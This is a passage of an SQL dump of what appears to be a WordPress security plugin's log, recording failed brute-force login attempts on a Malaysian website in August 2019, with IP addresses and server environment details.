empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"user\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"5.196.204.173\";s:11:\"REMOTE_PORT\";s:5:\"50974\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQzfBTEVi0fEJEHuDZJgQAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566847868.9576\";s:12:\"REQUEST_TIME\";s:10:\"1566847868\";}}','notice','2019-08-26 19:31:10','2019-08-26 19:31:09',18203328,19501440,'https://bintara.com.my/xmlrpc.php',1,0,'5.196.204.173'),(23230,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.232.61.121\";s:11:\"REMOTE_PORT\";s:5:\"39472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ1o2XkG1atThADMYGOOgAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566848419.3027\";s:12:\"REQUEST_TIME\";s:10:\"1566848419\";}}','notice','2019-08-26 19:40:20','2019-08-26 19:40:19',17690032,19175160,'https://bintara.com.my/wp-login.php',1,0,'132.232.61.121'),(23231,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.232.61.121\";s:11:\"REMOTE_PORT\";s:5:\"39472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ1o2XkG1atThADMYGOOgAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566848419.3027\";s:12:\"REQUEST_TIME\";s:10:\"1566848419\";}}','notice','2019-08-26 19:40:21','2019-08-26 19:40:19',17851096,19175160,'https://bintara.com.my/wp-login.php',1,0,'132.232.61.121'),(23232,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.119.81.237\";s:11:\"REMOTE_PORT\";s:5:\"37947\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ5YRTEVi0fEJEHuDZPewAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566849377.8483\";s:12:\"REQUEST_TIME\";s:10:\"1566849377\";}}','notice','2019-08-26 19:56:19','2019-08-26 19:56:18',17683736,19174952,'https://bintara.com.my/wp-login.php',1,0,'45.119.81.237'),(23233,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.128.53\";s:11:\"REMOTE_PORT\";s:5:\"51530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ7nhTEVi0fEJEHuDZR3AAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566849950.9632\";s:12:\"REQUEST_TIME\";s:10:\"1566849950\";}}','notice','2019-08-26 20:05:52','2019-08-26 20:05:51',17682088,19174008,'https://bintara.com.my/wp-login.php',1,0,'206.189.128.53'),(23234,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.128.53\";s:11:\"REMOTE_PORT\";s:5:\"52300\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ7oRTEVi0fEJEHuDZR4AAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566849953.1837\";s:12:\"REQUEST_TIME\";s:10:\"1566849953\";}}','notice','2019-08-26 20:05:54','2019-08-26 20:05:53',18198032,19496424,'https://bintara.com.my/xmlrpc.php',1,0,'206.189.128.53'),(23235,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.79.117.202\";s:11:\"REMOTE_PORT\";s:5:\"55816\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQ9MIir4pgxiIHnHK4pOgAAAcE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566850352.3079\";s:12:\"REQUEST_TIME\";s:10:\"1566850352\";}}','notice','2019-08-26 20:12:33','2019-08-26 20:12:32',17684928,19176472,'https://bintara.com.my/wp-login.php',1,0,'51.79.117.202'),(23237,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"202.6.141.211\";s:11:\"REMOTE_PORT\";s:5:\"58295\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRAzxTEVi0fEJEHuDZW8gAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566851279.356\";s:12:\"REQUEST_TIME\";s:10:\"1566851279\";}}','notice','2019-08-26 20:28:00','2019-08-26 20:27:59',17686200,19176256,'https://bintara.com.my/wp-login.php',1,0,'202.6.141.211'),(23238,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRCGBTEVi0fEJEHuDZXjAAAABU\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"132.148.105.8\";s:11:\"REMOTE_PORT\";s:5:\"54783\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCGBTEVi0fEJEHuDZXjAAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566851608.1809\";s:12:\"REQUEST_TIME\";s:10:\"1566851608\";}}','notice','2019-08-26 20:33:31','2019-08-26 